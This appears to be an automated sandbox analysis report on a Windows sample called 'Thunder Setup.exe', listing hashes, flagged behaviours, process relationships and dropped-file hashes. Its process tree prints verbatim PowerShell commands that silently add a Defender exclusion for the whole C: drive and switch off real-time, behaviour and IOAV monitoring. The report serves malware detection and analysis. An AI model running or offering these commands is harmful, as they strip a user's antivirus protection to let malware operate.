Analysis
-
max time kernel
301s -
max time network
276s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
14/07/2024, 22:14
Static task
static1
Behavioral task
behavioral1
Sample
Thunder Setup.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
Thunder Setup.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
Thunder Setup.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral4
Sample
Thunder Setup.exe
Resource
win11-20240709-en
General
-
Target
Thunder Setup.exe
-
Size
78KB
-
MD5
1eb797341e423c83060a36b92c720cc9
-
SHA1
380828212f0bb9a82d568491247a590a316e4351
-
SHA256
0842a46a5113b1ff571e62101c556565c853a0c0c792f7fdde57eb40e0256177
-
SHA512
9115d3a22f0163747de035273cd44caa84c46e17cd3fee863172e35688455def25e07bdbf7bdcec940dfd8bd2da7eb10e360d7f5a9413efc8c4b61ad4605c19b
-
SSDEEP
1536:aZ2FWSNhd/4131izmvch6oKnLzx9QAkhHQ40Gp/VS6:A2ddQ131izLh6oqLzHHuHQ40Gp/VT
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Run Powershell and hide display window.
pid Process 4696 Powershell.exe 3132 Powershell.exe 2592 Powershell.exe 2500 Powershell.exe 4696 Powershell.exe 1404 powershell.exe 3392 powershell.exe 3872 powershell.exe 4808 powershell.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 2500 Powershell.exe 2592 Powershell.exe 4696 Powershell.exe 3132 Powershell.exe 2592 Powershell.exe 2500 Powershell.exe 4696 Powershell.exe 3132 Powershell.exe 4808 powershell.exe 3872 powershell.exe 1404 powershell.exe 3392 powershell.exe 4808 powershell.exe 3872 powershell.exe 1404 powershell.exe 3392 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 3132 Powershell.exe Token: SeDebugPrivilege 4696 Powershell.exe Token: SeDebugPrivilege 2500 Powershell.exe Token: SeDebugPrivilege 2592 Powershell.exe Token: SeDebugPrivilege 4808 powershell.exe Token: SeDebugPrivilege 3872 powershell.exe Token: SeDebugPrivilege 1404 powershell.exe Token: SeDebugPrivilege 3392 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4092 javaw.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 4224 wrote to memory of 4092 4224 Thunder Setup.exe 84 PID 4224 wrote to memory of 4092 4224 Thunder Setup.exe 84 PID 4224 wrote to memory of 4092 4224 Thunder Setup.exe 84 PID 4092 wrote to memory of 4696 4092 javaw.exe 85 PID 4092 wrote to memory of 4696 4092 javaw.exe 85 PID 4092 wrote to memory of 4696 4092 javaw.exe 85 PID 4092 wrote to memory of 3132 4092 javaw.exe 86 PID 4092 wrote to memory of 3132 4092 javaw.exe 86 PID 4092 wrote to memory of 3132 4092 javaw.exe 86 PID 4092 wrote to memory of 2500 4092 javaw.exe 87 PID 4092 wrote to memory of 2500 4092 javaw.exe 87 PID 4092 wrote to memory of 2500 4092 javaw.exe 87 PID 4092 wrote to memory of 2592 4092 javaw.exe 89 PID 4092 wrote to memory of 2592 4092 javaw.exe 89 PID 4092 wrote to memory of 2592 4092 javaw.exe 89 PID 2500 wrote to memory of 4808 2500 Powershell.exe 93 PID 2500 wrote to memory of 4808 2500 Powershell.exe 93 PID 2500 wrote to memory of 4808 2500 Powershell.exe 93 PID 2592 wrote to memory of 3872 2592 Powershell.exe 94 PID 2592 wrote to memory of 3872 2592 Powershell.exe 94 PID 2592 wrote to memory of 3872 2592 Powershell.exe 94 PID 4696 wrote to memory of 1404 4696 Powershell.exe 95 PID 4696 wrote to memory of 1404 4696 Powershell.exe 95 PID 4696 wrote to memory of 1404 4696 Powershell.exe 95 PID 3132 wrote to memory of 3392 3132 Powershell.exe 96 PID 3132 wrote to memory of 3392 3132 Powershell.exe 96 PID 3132 wrote to memory of 3392 3132 Powershell.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\Thunder Setup.exe"C:\Users\Admin\AppData\Local\Temp\Thunder Setup.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4224 -
C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe"C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\activation.jar;lib\antlr4-runtime.jar;lib\asm-all.jar;lib\commons-email.jar;lib\connector-api.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\dyn4j.jar;lib\gson.jar;lib\HikariCP-java6.jar;lib\javassist-GA.jar;lib\jaybird-jdk18.jar;lib\jfoenix.jar;lib\jkeymaster.jar;lib\jna.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-desktop-hotkey-ext.jar;lib\jphp-game-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-gui-jfoenix-ext.jar;lib\jphp-json-ext.jar;lib\jphp-jsoup-ext.jar;lib\jphp-mail-ext.jar;lib\jphp-runtime.jar;lib\jphp-sql-ext.jar;lib\jphp-systemtray-ext.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\jsoup.jar;lib\mail.jar;lib\mysql-connector-java.jar;lib\postgresql.jre7.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\sqlite-jdbc.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exePowershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Add-MpPreference -Force -ExclusionPath C:\' -Verb RunAs}"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4696 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:\4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1404
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exePowershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableBehaviorMonitoring ' -Verb RunAs}"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3392
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exePowershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableIOAVProtection ' -Verb RunAs}"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableIOAVProtection4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4808
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exePowershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableRealtimeMonitoring ' -Verb RunAs}"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableRealtimeMonitoring4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3872
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5def65711d78669d7f8e69313be4acf2e
SHA16522ebf1de09eeb981e270bd95114bc69a49cda6
SHA256aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c
SHA51205b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7
-
Filesize
15KB
MD527088a26b157d4f73b6dd7d06a180f70
SHA15e329a4451a85d386c0dfb1bc754f13336861782
SHA25624b13b266cfeabdc512449170ac13f138e9e1430ab229c5b1cfd55617f110e5a
SHA512236c0465e8ea15177a69dfe5eb7d84be14b2af137c61b5c0e22c66ecc5aefe041e0e2ad81a901ad8ef9661f877cc48e146fe1096a959c9675e8f492033dff25b
-
Filesize
18KB
MD597353662244bc4174db14298cab90c7c
SHA1c3e4fae1cb1263905e01920caafe8f6a050d7477
SHA256d74803d04a069382bb4ceb041629f95928fe2a03a538168dd102f01478e346e5
SHA512edf211ba60bff6e320421fd6332e1c990c4a8c2999b2fbc660284dc94524d569fbdd3367d56fe3dbb27ae53176bf2ea3f0e5d7b2b6ee7c2ed443b01489f15abf
-
Filesize
18KB
MD5d72baa035d4247e98ded1192edefea59
SHA1bdd6ccb929d749934f1aed7f104776b82c60d82c
SHA25631a4370f061895b286cf902bab6fd890625e417d3323452e443adc145491510c
SHA512ff20d28bf34948d2ae21cfaec5a949701f0cf385a8e0bb7dc239ddf490276a1d12d474b7028e8795c03b40f0a11b8e90f552e3a29410c5a20b4c1d7acccc5923
-
Filesize
18KB
MD5964d3e54bc9013419009d9e77bfa9829
SHA136387b307b0c6b41bd1bbf73d5a4c547893fce0f
SHA256cf62dbf0e0f300f85d8eb7e2cdb053ca3b5f80bb59fbff9fbedc2fc4c2404602
SHA512a01eabde120e55749886f09c2eb22d78633004bac71ba120180ad0b80ad508c593caa0a713aae92e6f99d03c740a17bcdd40b443be20f9492e6cec20cef771d7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82